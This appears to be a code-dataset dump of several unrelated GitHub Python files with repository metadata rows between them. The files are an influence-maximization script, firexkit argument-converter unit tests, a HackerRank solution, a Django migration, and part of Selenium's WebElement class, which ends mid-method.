elif index <= edges_amount:
start = int(line.split(' ')[0])
end = int(line.split(' ')[1])
edge_weight = float(line.split(' ')[2])
nodes[start][end] = edge_weight
nodes_set[start].add(end)
# if len(nodes) == 0 or not nodes.has_key(start):
# nodes.update({start:{}})
# nodes[start].update({end: edge_weight})
# else:
# nodes[start].update({end: edge_weight})
index += 1
# def open_seed_file(filename):
# global seed_set
# f = open(filename, 'r')
# for line in f:
# seed_set.append(int(line))
def ise_ic_sample(amount, seed_set):
result_sum = 0
for k in range(0, amount):
nodes_condition = num.zeros(nodes_amount + 1)
activity_set = seed_set
for i in seed_set:
nodes_condition[i] = 1
count = len(activity_set)
while activity_set:
new_activity_set = []
for i in activity_set:
for j in nodes[i]:
if nodes_condition[j] == 0:
probability = random.random()
if probability <= nodes[i][j]:
nodes_condition[j] = 1
new_activity_set.append(j)
count = count + len(new_activity_set)
activity_set = new_activity_set
for i in range(1, nodes_amount + 1):
nodes_condition[i] = 0
result_sum += count
return float(result_sum)/amount
def ise_lt_sample(amount, seed_set):
result_sum = 0
k = 0
while k < amount:
activity_set = seed_set
nodes_condition = num.zeros(nodes_amount+1)
new_weight = num.zeros(nodes_amount+1)
threshold = num.zeros(nodes_amount+1)
for i in seed_set:
nodes_condition[i] = 1
count = len(activity_set)
while activity_set:
new_activity_set = []
for i in activity_set:
for j in nodes[i]:
if nodes_condition[j] == 0:
if threshold[j] == 0:
threshold[j] = random.random()
new_weight[j] += nodes[i][j]
if new_weight[j] > threshold[j]:
nodes_condition[j] = 1
new_activity_set.append(j)
count += len(new_activity_set)
activity_set = new_activity_set
for i in range(1, nodes_amount + 1):
nodes_condition[i] = 0
result_sum += count
k += 1
return float(result_sum)/amount
def imp_parse_command_line():
parser = argparse.ArgumentParser(description="IMP -- Influence Maximization Processor")
parser.add_argument("-i", metavar="<social network>", dest="network", type=str, required=True,
help="the absolute path of the social network file.")
parser.add_argument("-k", metavar="<predefined size of the seed set>", dest="size", type=int, required=True,
help="a positive integer.")
parser.add_argument("-m", metavar="<diffusion model>", dest="model", type=str, required=True,
help="diffusion model which can only be IC or LT.")
parser.add_argument("-b", metavar="<termination type>", dest="termination", type=int, required=True,
help="specifies the termination manner and the value can\
only be 0 or 1. If it is set to 0, the termination condition is as the same\
defined in your algorithm. Otherwise, the maximal time budget specifies\
the termination condition of your algorithm.")
parser.add_argument("-t", metavar="<time budget>", dest="utime", type=int, required=True,
help="a positive number which indicates how many seconds\
(in Wall clock time, range: [60s, 1200s]) your algorithm can spend on\
this instance. If the <termination type> is 0, it still needs to accept -t\
<time budget>, but can just ignore it while estimating.")
parser.add_argument("-r", metavar="<random seed>", dest="rand", type=str, default=None,
help="random seed used in the algorithm")
args = parser.parse_args()
# print args.network, args.size, args.model, args.termination, args.utime, args.rand
if args.termination != 0 and args.termination != 1:
parser.error('argument -b: should be 0 or 1.')
return args.network, args.size, args.model, args.termination, args.utime, args.rand
# def count_dv(node):
# has_count = num.zeros(nodes_amount+1)
# queue = list()
# count = 0
# queue.append(node)
# print node
# while queue:
# node = queue.pop(0)
#
# has_count[node] = 1
# for i in nodes[node]:
# if has_count[i] == 0:
# queue.append(i)
# count += 1
# return count
def ic_model(size, p):
# {v:{{dv: },{tv: },{ddv: }}
set_v = set()
set_s = set()
degree = defaultdict(dict)
global end_time
for i in nodes.keys():
# number = count_dv(i)
degree[i]["dv"] = len(nodes[i])
degree[i]["tv"] = 0
degree[i]["ddv"] = len(nodes[i])
set_v.add(i)
print set_v
k = 0
while end_time-start_time <= u_time-3 and k<size :
max_num = 0
vertex = None
for element in set_v:
if degree[element]["ddv"] > max_num:
max_num = degree[element]["ddv"]
vertex = element
set_s.add(vertex)
print vertex
set_v.remove(vertex)
for element in nodes[vertex]:
if element in degree:
dv = degree[element]["dv"]
degree[element]["tv"] = len(nodes_set[element]&set_s)
tv = degree[element]["tv"]
degree[element]["ddv"] =2*tv+(dv-tv)*tv*p
if termination == 1:
end_time = time.time()
k += 1
return set_s
def lazy_forward(k, model_type, sample_type):
new_seed_set = set()
vertex_set = set()
cost_function = {}
cur_s = {}
global end_time
for i in nodes:
if nodes[i]:
vertex_set.add(i)
cost_function.update({i: sys.maxint})
cur_s.update({i: sys.maxint})
while len(new_seed_set)+1 <= k and end_time-start_time <= u_time-3:
for s in vertex_set - new_seed_set:
cur_s[s] = 0
combine_set_a = []
for s in new_seed_set:
combine_set_a.append(s)
if sample_type == "IC":
round_test = ise_ic_sample(1000, combine_set_a)
else:
round_test = ise_lt_sample(1000,combine_set_a)
while 1:
max_value = -sys.maxint
seed_star = None
for s in vertex_set - new_seed_set:
if model_type == "UC":
if max_value<cost_function[s]:
max_value = cost_function[s]
seed_star = s
if model_type == "CB":
if max_value < cost_function[s]/(len(nodes[s])+1):
max_value = cost_function[s]
seed_star = s
if cur_s[seed_star] == 1:
new_seed_set.add(seed_star)
vertex_set.remove(seed_star)
break
else:
combine_set = []
for i in new_seed_set:
combine_set.append(i)
combine_set.append(seed_star)
if sample_type == "IC":
cost_function[seed_star] = ise_ic_sample(1000, combine_set) - round_test
cur_s[seed_star] = 1
else:
cost_function[seed_star] = ise_lt_sample(1000, combine_set) - round_test
cur_s[seed_star] = 1
if termination ==1:
end_time = time.time()
seed_set = []
for i in new_seed_set:
seed_set.append(i)
return seed_set
def cost_effective_lazy_forward(k, sample_type):
seed_set1 = lazy_forward(k, "UC", sample_type)
seed_set2 = lazy_forward(k ,"CB", sample_type)
if sample_type == "IC":
result1 = ise_ic_sample(10000, seed_set1)
result2 = ise_ic_sample(10000, seed_set2)
if result1 > result2:
return seed_set1
else:
return seed_set2
if sample_type == "LT":
result1 = ise_ic_sample(10000, seed_set1)
result2 = ise_ic_sample(10000, seed_set2)
if result1 > result2:
return seed_set1
else:
return seed_set2
if __name__ == "__main__":
network, size, model, termination, u_time, rand = imp_parse_command_line()
open_network_file(network)
random.seed(rand)
if termination == 1:
start_time = time.time()
if edges_amount>1000:
get_seed_set = ic_model(size, 0.01)
else:
get_seed_set = cost_effective_lazy_forward(size, model)
for get_seed in get_seed_set:
print get_seed
else:
end_time = -sys.maxint
start_time = 0
get_seed_set = cost_effective_lazy_forward(size, model)
for get_seed in get_seed_set:
print get_seed
# open_network_file("C:\Users\THINKPAD\PycharmProjects\IMP\AI_IMP\AI_IMP\\network.txt")
# print nodes
# termination = 0
# u_time = sys.maxint
# seed_set = ic_model(4, 0.01)
# print ise_lt_sample(1000, seed_set)
| [
"noreply@github.com"
] | Reallyee.noreply@github.com |
7b4a7d4f9d50c3b15fdcdad534c4dc1667e58609 | 22979cf58a2cc0059c4d9bbee4c53c7303f0e88c | /tests/unit_tests/argument_conversion_tests.py | d49ac6d75b9dba22e84e6c58f453dcc3c78ccfb0 | [
"BSD-3-Clause"
] | permissive | FireXStuff/firexkit | 5477baeceeee8c8a6b4ee03408827e6d6ad08f41 | a2f2565ae9fdfda5463c0b86aa5a2ec112740f17 | refs/heads/master | 2023-08-19T08:50:55.574486 | 2023-08-16T00:31:45 | 2023-08-16T00:31:45 | 165,108,555 | 3 | 0 | NOASSERTION | 2022-01-06T22:28:44 | 2019-01-10T18:12:47 | Python | UTF-8 | Python | false | false | 11,473 | py |
import unittest
from celery import Celery
from firexkit.argument_conversion import ConverterRegister, CircularDependencyException, \
MissingConverterDependencyError, ConverterRegistrationException, NameDuplicationException, SingleArgDecorator, \
ArgumentConversionException
from firexkit.task import FireXTask
class ArgConversionTests(unittest.TestCase):
def test_converter_registration(self):
test_input_converter = ConverterRegister()
@test_input_converter.register
def converter_no_dependency(kwargs):
kwargs['converter_no_dependency'] = True
return kwargs
@test_input_converter.register('converter_no_dependency')
def converter_str_dependency(kwargs):
kwargs['converter_str_dependency'] = True
return kwargs
@test_input_converter.register('converter_no_dependency',
'converter_str_dependency')
def converter_list_dependency(kwargs):
kwargs['converter_list_dependency'] = True
return kwargs
converted = test_input_converter.convert(**{})
self.assertTrue('converter_no_dependency' in converted)
self.assertTrue('converter_str_dependency' in converted)
self.assertTrue('converter_list_dependency' in converted)
with self.assertRaises(MissingConverterDependencyError):
@test_input_converter.register('Nope')
def missing_dependent(_):
# Should not reach here
pass # pragma: no cover
test_input_converter.convert(**{})
def test_converter_dependency(self):
unit_test_obj = self
test_input_converter = ConverterRegister()
@test_input_converter.register
def converter_one(kwargs):
kwargs['converter_one'] = True
return kwargs
@test_input_converter.register('converter_one')
def converter_two(kwargs):
unit_test_obj.assertTrue('converter_one' in kwargs)
kwargs['converter_two'] = True
return kwargs
@test_input_converter.register('converter_four')
def converter_three(kwargs):
unit_test_obj.assertTrue('converter_four' in kwargs)
kwargs['converter_three'] = True
return kwargs
@test_input_converter.register
def converter_four(kwargs):
kwargs['converter_four'] = True
return kwargs
############################
# test multiple dependencies
@test_input_converter.register('converter_one',
'converter_two',
'converter_three',
'converter_four')
def converter_five(kwargs):
unit_test_obj.assertTrue('converter_one' in kwargs)
unit_test_obj.assertTrue('converter_two' in kwargs)
unit_test_obj.assertTrue('converter_three' in kwargs)
unit_test_obj.assertTrue('converter_four' in kwargs)
return kwargs
test_input_converter.convert(**{})
#######################################
# test detection of circular dependency
test_input_converter = ConverterRegister()
with self.assertRaises(CircularDependencyException):
@test_input_converter.register('converter_seven')
def converter_six(_):
# Should not reach here
pass # pragma: no cover
@test_input_converter.register('converter_eight')
def converter_seven(_):
# Should not reach here
pass # pragma: no cover
@test_input_converter.register('converter_six')
def converter_eight(_):
# Should not reach here
pass # pragma: no cover
test_input_converter.convert(**{})
################################
# test unrecognized dependencies
test_input_converter = ConverterRegister()
with self.assertRaises(MissingConverterDependencyError):
@test_input_converter.register("this_is_not_valid")
def converter_unrecognised(_):
pass # Should not reach here # pragma: no cover
test_input_converter.convert(**{})
#####################################################
# test in combination with boolean to indicate pre or post task
test_input_converter = ConverterRegister()
@test_input_converter.register(True)
def converter_nine(kwargs):
kwargs['converter_nine'] = True
@test_input_converter.register(False)
def converter_ten(kwargs):
kwargs['converter_ten'] = True
@test_input_converter.register(False, "converter_ten")
def converter_eleven(kwargs):
kwargs['converter_eleven'] = True
unit_test_obj.assertTrue('converter_ten' in kwargs)
@test_input_converter.register("converter_eleven", False, "converter_ten")
def converter_twelve(kwargs):
unit_test_obj.assertTrue('converter_ten' in kwargs)
unit_test_obj.assertTrue('converter_eleven' in kwargs)
test_input_converter.convert(**{})
test_input_converter.convert(pre_task=False, **{})
#####################################################
# test pre cannot be dependant on post
test_input_converter = ConverterRegister()
@test_input_converter.register(True)
def converter_thirteen(kwargs):
kwargs['converter_thirteen'] = True
# post can be dependant on pre
@test_input_converter.register(False, "converter_thirteen")
def converter_fourteen(kwargs):
unit_test_obj.assertTrue('converter_thirteen' in kwargs)
kw = test_input_converter.convert(pre_task=True, **{})
test_input_converter.convert(pre_task=False, **kw)
@test_input_converter.register(True, "converter_fourteen")
def converter_fifteen(_):
# Should not reach here
pass # pragma: no cover
with self.assertRaises(MissingConverterDependencyError):
test_input_converter.convert(pre_task=True, **{})
#####################################################
# test pre cannot be dependant on post
test_input_converter = ConverterRegister()
with self.assertRaises(CircularDependencyException):
@test_input_converter.register("converter_sixteen")
def converter_sixteen(_):
# Should not reach here
pass # pragma: no cover
test_input_converter.convert(pre_task=True, **{})
def test_exclude_indirect_args(self):
test_input_converter = ConverterRegister()
@test_input_converter.register(True)
def no_indirect(kwargs):
# indirect args should not be passed to converters
self.assertTrue("excluded" not in kwargs)
self.assertTrue("ignored" in kwargs)
self.assertTrue(kwargs["included"])
kw = test_input_converter.convert(pre_task=True,
**{
"excluded": "@included",
"included": True,
"ignored": "anything",
})
self.assertTrue("excluded" in kw)
self.assertTrue("included" in kw)
self.assertTrue("ignored" in kw)
# single arg converter redundantly filters @indirect
@SingleArgDecorator("filter")
def boom(_):
raise Exception("Test Fail") # pragma: no cover
boom({"filter": "@ya"})
def test_failing_converters(self):
test_app = Celery()
@test_app.task(base=FireXTask)
def a_task():
# Should not reach here
pass # pragma: no cover
with self.assertRaises(ConverterRegistrationException):
# no Function provided
ConverterRegister.register_for_task(a_task)(None)
test_input_converter = ConverterRegister()
with self.assertRaises(ConverterRegistrationException):
# no arguments provided
test_input_converter.register()
test_input_converter = ConverterRegister()
with self.assertRaises(ConverterRegistrationException):
@test_input_converter.register(True, {}) # bad type
def go_boom(_):
# Should not reach here
pass # pragma: no cover
class TestException(Exception):
pass
@test_input_converter.register
def go_boom(_):
raise TestException()
with self.assertRaises(TestException):
test_input_converter.convert()
with self.assertRaises(NameDuplicationException):
# register the same thing a second time
@test_input_converter.register
def go_boom(_):
# Should not reach here
pass # pragma: no cover
with self.assertRaises(NameDuplicationException):
test_input_converter._check_not_registered("go_boom", {"go_boom": go_boom})
def test_single_arg_converter(self):
test_input_converter = ConverterRegister()
@test_input_converter.register
@SingleArgDecorator("hit_this", "this_is_not_there", "skip_this")
def flip(arg_value):
return not arg_value
@test_input_converter.register
@SingleArgDecorator("ya no")
def nope(_):
return None
data = {
"hit_this": False,
"skip_this": "@hit_this",
"do_not_hit_this": False,
"ya no": "yes"
}
result = test_input_converter.convert(**data)
self.assertTrue(result["hit_this"])
self.assertFalse(result["do_not_hit_this"])
self.assertTrue("this_is_not_there" not in result)
self.assertTrue(result["skip_this"] == "@hit_this")
self.assertIsNone(result["ya no"])
@test_input_converter.register
@SingleArgDecorator("match")
def go_boom(_):
raise NotImplementedError("Go boom")
with self.assertRaises(ArgumentConversionException):
test_input_converter.convert(**{"match": True})
with self.assertRaises(ConverterRegistrationException):
@test_input_converter.register
@SingleArgDecorator
def forgot_brackets(_):
pass # pragma: no cover
with self.assertRaises(ConverterRegistrationException):
@test_input_converter.register
@SingleArgDecorator()
def forgot_the_arg(_):
pass # pragma: no cover
def test_append_to_single_arg_converter(self):
test_input_converter = ConverterRegister()
@test_input_converter.register
@SingleArgDecorator("initial_arg")
def flip(arg_value):
return not arg_value
flip.append("dynamic_arg")
data = {
"initial_arg": False,
"dynamic_arg": False
}
result = test_input_converter.convert(**data)
self.assertTrue(result["initial_arg"])
self.assertTrue(result["dynamic_arg"])
| [
"mdelahou@cisco.com"
] | mdelahou@cisco.com |
9545d7256754ef0710c102831768350d3f6fa5b7 | 2e9c62790b162adc6e68a8012227a1b66b82b7b2 | /HackerRank/Contest/swapping_in_the_array.py | b3106fb299a6b21fdb53d6cac22e7c3bd77ab4b1 | [] | no_license | pandeynandancse/Compeitive-programming-solutions | a2756d5f9d7acc24ec67586339b53f65ee69d5e1 | 339a4e86635842d26c3dc507dff916d18ae981a3 | refs/heads/master | 2020-03-31T18:59:51.084045 | 2018-10-13T14:46:11 | 2018-10-13T14:46:11 | 152,481,048 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 752 | py | #!/bin/python3
import math
import os
import random
import re
import sys
# Complete the swapToSort function below.
def swapToSort(a):
# Return -1 or 0 or 1 as described in the problem statement.
z=sorted(a)
count = 0
if z == a:
return 0
if z != a :
print(len(z))
for i in range(len(z)):
if z[i]==a[i]:
continue
else:
count = count + 1
if count == 2:
return 1
else:
return -1
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input())
a = list(map(int, input().rstrip().split()))
result = swapToSort(a)
print(result)
fptr.write(str(result) + '\n')
fptr.close()
| [
"noreply@github.com"
] | pandeynandancse.noreply@github.com |
461fa08a7e9956a25c3151e5bda3ad53bd073017 | 87aeeaeba71d68a2056c6479b406e73a688b7a1c | /blog/migrations/0005_auto_20200325_1113.py | fec8bef8102be301d9a47576f8c95cd9217108e3 | [] | no_license | dhrvjha/marena | 2376d5e4c45af7377faaf4fe5ecf4f5725e9eb0a | 7c2ff6cb102770bc6ba6e6534143055071cd1439 | refs/heads/master | 2022-06-22T01:56:25.017241 | 2020-05-06T20:15:30 | 2020-05-06T20:15:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | # Generated by Django 3.0.3 on 2020-03-25 05:43
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0004_auto_20200322_2227'),
]
operations = [
migrations.AlterField(
model_name='posts',
name='date_posted',
field=models.DateTimeField(auto_now_add=True),
),
]
| [
"kdhruv71@gmail.com"
] | kdhruv71@gmail.com |
63af9fa38e554698f98f4907faea4df374a1800d | 2bd6e4ab766157c490c829ed4b4ef6793cd43a09 | /__init__.py | 426b755f2c03d771cf3f56da6fb43ae623f9b34e | [] | no_license | ddd1020/runner | e1881a52dbcef4a311f8f15dba9365d88e74edb5 | 29e9a86dbe14ebfec77192e96886e7e80a89ee2b | refs/heads/master | 2021-07-25T17:47:02.414805 | 2017-11-06T00:23:52 | 2017-11-06T00:23:52 | 109,626,977 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 36 | py | from tasks import process_data_task
| [
"dauren@gmail.com"
] | dauren@gmail.com |
60a0c595182335ceb7d34ad2e2e8f0333bfdddbe | dbb3142ded7dcfd671678161a0354923641320d4 | /tools/other_library/selenium/webdriver/remote/webelement.py | c786d1d99ab81ee24c7bfa177380c9412ddb05d9 | [] | no_license | l15892531078/Venus_test | 8531d4ac2d27cfd09bd9cdd7dc6a492eca4f4aba | 62eb7752dc3859a1096607b64e2a4ebf21eca1d4 | refs/heads/master | 2022-12-19T10:16:42.049242 | 2020-09-20T06:04:29 | 2020-09-20T06:04:29 | 297,006,509 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,793 | py | # Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import base64
import hashlib
import os
import pkgutil
import warnings
import zipfile
from Venus.tools.other_library.selenium.common.exceptions import WebDriverException
from Venus.tools.other_library.selenium.webdriver.common.by import By
from Venus.tools.other_library.selenium.webdriver.common.utils import keys_to_typing
from Venus.tools.other_library.selenium.webdriver.remote.command import Command
# Python 3 imports
try:
str = basestring
except NameError:
pass
try:
from StringIO import StringIO as IOStream
except ImportError: # 3+
from io import BytesIO as IOStream
# not relying on __package__ here as it can be `None` in some situations (see #4558)
_pkg = '.'.join(__name__.split('.')[:-1])
getAttribute_js = pkgutil.get_data(_pkg, 'getAttribute.js').decode('utf8')
isDisplayed_js = pkgutil.get_data(_pkg, 'isDisplayed.js').decode('utf8')
class WebElement(object):
"""Represents a DOM element.
Generally, all interesting operations that interact with a document will be
performed through this interface.
All method calls will do a freshness check to ensure that the element
reference is still valid. This essentially determines whether or not the
element is still attached to the DOM. If this test fails, then an
``StaleElementReferenceException`` is thrown, and all future calls to this
instance will fail."""
def __init__(self, parent, id_, w3c=False):
self._parent = parent
self._id = id_
self._w3c = w3c
def __repr__(self):
return '<{0.__module__}.{0.__name__} (session="{1}", element="{2}")>'.format(
type(self), self._parent.session_id, self._id)
@property
def tag_name(self):
"""This element's ``tagName`` property."""
return self._execute(Command.GET_ELEMENT_TAG_NAME)['value']
@property
def text(self):
"""The text of the element."""
return self._execute(Command.GET_ELEMENT_TEXT)['value']
def click(self):
"""Clicks the element."""
self._execute(Command.CLICK_ELEMENT)
def submit(self):
"""Submits a form."""
if self._w3c:
form = self.find_element(By.XPATH, "./ancestor-or-self::form")
self._parent.execute_script(
"var e = arguments[0].ownerDocument.createEvent('Event');"
"e.initEvent('submit', true, true);"
"if (arguments[0].dispatchEvent(e)) { arguments[0].submit() }", form)
else:
self._execute(Command.SUBMIT_ELEMENT)
def clear(self):
"""Clears the text if it's a text entry element."""
self._execute(Command.CLEAR_ELEMENT)
def get_property(self, name):
"""
Gets the given property of the element.
:Args:
- name - Name of the property to retrieve.
Example::
text_length = target_element.get_property("text_length")
"""
try:
return self._execute(Command.GET_ELEMENT_PROPERTY, {"name": name})["value"]
except WebDriverException:
# if we hit an end point that doesnt understand getElementProperty lets fake it
return self.parent.execute_script('return arguments[0][arguments[1]]', self, name)
def get_attribute(self, name):
"""Gets the given attribute or property of the element.
This method will first try to return the value of a property with the
given name. If a property with that name doesn't exist, it returns the
value of the attribute with the same name. If there's no attribute with
that name, ``None`` is returned.
Values which are considered truthy, that is equals "true" or "false",
are returned as booleans. All other non-``None`` values are returned
as strings. For attributes or properties which do not exist, ``None``
is returned.
:Args:
- name - Name of the attribute/property to retrieve.
Example::
# Check if the "active" CSS class is applied to an element.
is_active = "active" in target_element.get_attribute("class")
"""
attributeValue = ''
if self._w3c:
attributeValue = self.parent.execute_script(
"return (%s).apply(null, arguments);" % getAttribute_js,
self, name)
else:
resp = self._execute(Command.GET_ELEMENT_ATTRIBUTE, {'name': name})
attributeValue = resp.get('value')
if attributeValue is not None:
if name != 'value' and attributeValue.lower() in ('true', 'false'):
attributeValue = attributeValue.lower()
return attributeValue
def is_selected(self):
"""Returns whether the element is selected.
Can be used to check if a checkbox or radio button is selected.
"""
return self._execute(Command.IS_ELEMENT_SELECTED)['value']
def is_enabled(self):
"""Returns whether the element is enabled."""
return self._execute(Command.IS_ELEMENT_ENABLED)['value']
def find_element_by_id(self, id_):
"""Finds element within this element's children by ID.
:Args:
- id\_ - ID of child element to locate.
:Returns:
- WebElement - the element if it was found
:Raises:
- NoSuchElementException - if the element wasn't found
:Usage:
foo_element = element.find_element_by_id('foo')
"""
return self.find_element(by=By.ID, value=id_)
def find_elements_by_id(self, id_):
"""Finds a list of elements within this element's children by ID.
Will return a list of webelements if found, or an empty list if not.
:Args:
- id\_ - Id of child element to find.
:Returns:
- list of WebElement - a list with elements if any was found. An
empty list if not
:Usage:
elements = element.find_elements_by_id('foo')
"""
return self.find_elements(by=By.ID, value=id_)
def find_element_by_name(self, name):
"""Finds element within this element's children by name.
:Args:
- name - name property of the element to find.
:Returns:
- WebElement - the element if it was found
:Raises:
- NoSuchElementException - if the element wasn't found
:Usage:
element = element.find_element_by_name('foo')
"""
return self.find_element(by=By.NAME, value=name)
def find_elements_by_name(self, name):
"""Finds a list of elements within this element's children by name.
:Args:
- name - name property to search for.
:Returns:
- list of webelement - a list with elements if any was found. an
empty list if not
:Usage:
elements = element.find_elements_by_name('foo')
"""
return self.find_elements(by=By.NAME, value=name)
def find_element_by_link_text(self, link_text):
"""Finds element within this element's children by visible link text.
:Args:
- link_text - Link text string to search for.
:Returns:
- WebElement - the element if it was found
:Raises:
- NoSuchElementException - if the element wasn't found
:Usage:
element = element.find_element_by_link_text('Sign In')
"""
return self.find_element(by=By.LINK_TEXT, value=link_text)
def find_elements_by_link_text(self, link_text):
"""Finds a list of elements within this element's children by visible link text.
:Args:
- link_text - Link text string to search for.
:Returns:
- list of webelement - a list with elements if any was found. an
empty list if not
:Usage:
elements = element.find_elements_by_link_text('Sign In')
"""
return self.find_elements(by=By.LINK_TEXT, value=link_text)
def find_element_by_partial_link_text(self, link_text):
"""Finds element within this element's children by partially visible link text.
:Args:
- link_text: The text of the element to partially match on.
:Returns:
- WebElement - the element if it was found
:Raises:
- NoSuchElementException - if the element wasn't found
:Usage:
element = element.find_element_by_partial_link_text('Sign')
"""
return self.find_element(by=By.PARTIAL_LINK_TEXT, value=link_text)
def find_elements_by_partial_link_text(self, link_text):
"""Finds a list of elements within this element's children by link text.
:Args:
- link_text: The text of the element to partial match on.
:Returns:
- list of webelement - a list with elements if any was found. an
empty list if not
:Usage:
elements = element.find_elements_by_partial_link_text('Sign')
"""
return self.find_elements(by=By.PARTIAL_LINK_TEXT, value=link_text)
def find_element_by_tag_name(self, name):
"""Finds element within this element's children by tag name.
:Args:
- name - name of html tag (eg: h1, a, span)
:Returns:
- WebElement - the element if it was found
:Raises:
- NoSuchElementException - if the element wasn't found
:Usage:
element = element.find_element_by_tag_name('h1')
"""
return self.find_element(by=By.TAG_NAME, value=name)
def find_elements_by_tag_name(self, name):
"""Finds a list of elements within this element's children by tag name.
:Args:
- name - name of html tag (eg: h1, a, span)
:Returns:
- list of WebElement - a list with elements if any was found. An
empty list if not
:Usage:
elements = element.find_elements_by_tag_name('h1')
"""
return self.find_elements(by=By.TAG_NAME, value=name)
def find_element_by_xpath(self, xpath):
"""Finds element by xpath.
:Args:
- xpath - xpath of element to locate. "//input[@class='myelement']"
Note: The base path will be relative to this element's location.
This will select the first link under this element.
::
myelement.find_element_by_xpath(".//a")
However, this will select the first link on the page.
::
myelement.find_element_by_xpath("//a")
:Returns:
- WebElement - the element if it was found
:Raises:
- NoSuchElementException - if the element wasn't found
:Usage:
element = element.find_element_by_xpath('//div/td[1]')
"""
return self.find_element(by=By.XPATH, value=xpath)
def find_elements_by_xpath(self, xpath):
"""Finds elements within the element by xpath.
:Args:
- xpath - xpath locator string.
Note: The base path will be relative to this element's location.
This will select all links under this element.
::
myelement.find_elements_by_xpath(".//a")
However, this will select all links in the page itself.
::
myelement.find_elements_by_xpath("//a")
:Returns:
- list of WebElement - a list with elements if any was found. An
empty list if not
:Usage:
elements = element.find_elements_by_xpath("//div[contains(@class, 'foo')]")
"""
return self.find_elements(by=By.XPATH, value=xpath)
def find_element_by_class_name(self, name):
"""Finds element within this element's children by class name.
:Args:
- name: The class name of the element to find.
:Returns:
- WebElement - the element if it was found
:Raises:
- NoSuchElementException - if the element wasn't found
:Usage:
element = element.find_element_by_class_name('foo')
"""
return self.find_element(by=By.CLASS_NAME, value=name)
def find_elements_by_class_name(self, name):
"""Finds a list of elements within this element's children by class name.
:Args:
- name: The class name of the elements to find.
:Returns:
- list of WebElement - a list with elements if any was found. An
empty list if not
:Usage:
elements = element.find_elements_by_class_name('foo')
"""
return self.find_elements(by=By.CLASS_NAME, value=name)
def find_element_by_css_selector(self, css_selector):
"""Finds element within this element's children by CSS selector.
:Args:
- css_selector - CSS selector string, ex: 'a.nav#home'
:Returns:
- WebElement - the element if it was found
:Raises:
- NoSuchElementException - if the element wasn't found
:Usage:
element = element.find_element_by_css_selector('#foo')
"""
return self.find_element(by=By.CSS_SELECTOR, value=css_selector)
def find_elements_by_css_selector(self, css_selector):
"""Finds a list of elements within this element's children by CSS selector.
:Args:
- css_selector - CSS selector string, ex: 'a.nav#home'
:Returns:
- list of WebElement - a list with elements if any was found. An
empty list if not
:Usage:
elements = element.find_elements_by_css_selector('.foo')
"""
return self.find_elements(by=By.CSS_SELECTOR, value=css_selector)
def send_keys(self, *value):
"""Simulates typing into the element.
:Args:
- value - A string for typing, or setting form fields. For setting
file inputs, this could be a local file path.
Use this to send simple key events or to fill out form fields::
form_textfield = driver.find_element_by_name('username')
form_textfield.send_keys("admin")
This can also be used to set file inputs.
::
file_input = driver.find_element_by_name('profilePic')
file_input.send_keys("path/to/profilepic.gif")
# Generally it's better to wrap the file path in one of the methods
# in os.path to return the actual path to support cross OS testing.
# file_input.send_keys(os.path.abspath("path/to/profilepic.gif"))
"""
# transfer file to another machine only if remote driver is used
# the same behaviour as for java binding
if self.parent._is_remote:
local_file = self.parent.file_detector.is_local_file(*value)
if local_file is not None:
value = self._upload(local_file)
self._execute(Command.SEND_KEYS_TO_ELEMENT,
{'text': "".join(keys_to_typing(value)),
'value': keys_to_typing(value)})
# RenderedWebElement Items
def is_displayed(self):
"""Whether the element is visible to a user."""
# Only go into this conditional for browsers that don't use the atom themselves
if self._w3c:
return self.parent.execute_script(
"return (%s).apply(null, arguments);" % isDisplayed_js,
self)
else:
return self._execute(Command.IS_ELEMENT_DISPLAYED)['value']
@property
def location_once_scrolled_into_view(self):
"""THIS PROPERTY MAY CHANGE WITHOUT WARNING. Use this to discover
where on the screen an element is so that we can click it. This method
should cause the element to be scrolled into view.
Returns the top lefthand corner location on the screen, or ``None`` if
the element is not visible.
"""
if self._w3c:
old_loc = self._execute(Command.W3C_EXECUTE_SCRIPT, {
'script': "arguments[0].scrollIntoView(true); return arguments[0].getBoundingClientRect()",
'args': [self]})['value']
return {"x": round(old_loc['x']),
"y": round(old_loc['y'])}
else:
return self._execute(Command.GET_ELEMENT_LOCATION_ONCE_SCROLLED_INTO_VIEW)['value']
@property
def size(self):
"""The size of the element."""
size = {}
if self._w3c:
size = self._execute(Command.GET_ELEMENT_RECT)['value']
else:
size = self._execute(Command.GET_ELEMENT_SIZE)['value']
new_size = {"height": size["height"],
"width": size["width"]}
return new_size
def value_of_css_property(self, property_name):
"""The value of a CSS property."""
return self._execute(Command.GET_ELEMENT_VALUE_OF_CSS_PROPERTY, {
'propertyName': property_name})['value']
@property
def location(self):
"""The location of the element in the renderable canvas."""
if self._w3c:
old_loc = self._execute(Command.GET_ELEMENT_RECT)['value']
else:
old_loc = self._execute(Command.GET_ELEMENT_LOCATION)['value']
new_loc = {"x": round(old_loc['x']),
"y": round(old_loc['y'])}
return new_loc
@property
def rect(self):
"""A dictionary with the size and location of the element."""
if self._w3c:
return self._execute(Command.GET_ELEMENT_RECT)['value']
else:
rect = self.size.copy()
rect.update(self.location)
return rect
@property
def screenshot_as_base64(self):
"""
Gets the screenshot of the current element as a base64 encoded string.
:Usage:
img_b64 = element.screenshot_as_base64
"""
return self._execute(Command.ELEMENT_SCREENSHOT)['value']
@property
def screenshot_as_png(self):
"""
Gets the screenshot of the current element as a binary data.
:Usage:
element_png = element.screenshot_as_png
"""
return base64.b64decode(self.screenshot_as_base64.encode('ascii'))
def screenshot(self, filename):
"""
Saves a screenshot of the current element to a PNG image file. Returns
False if there is any IOError, else returns True. Use full paths in
your filename.
:Args:
- filename: The full path you wish to save your screenshot to. This
should end with a `.png` extension.
:Usage:
element.screenshot('/Screenshots/foo.png')
"""
if not filename.lower().endswith('.png'):
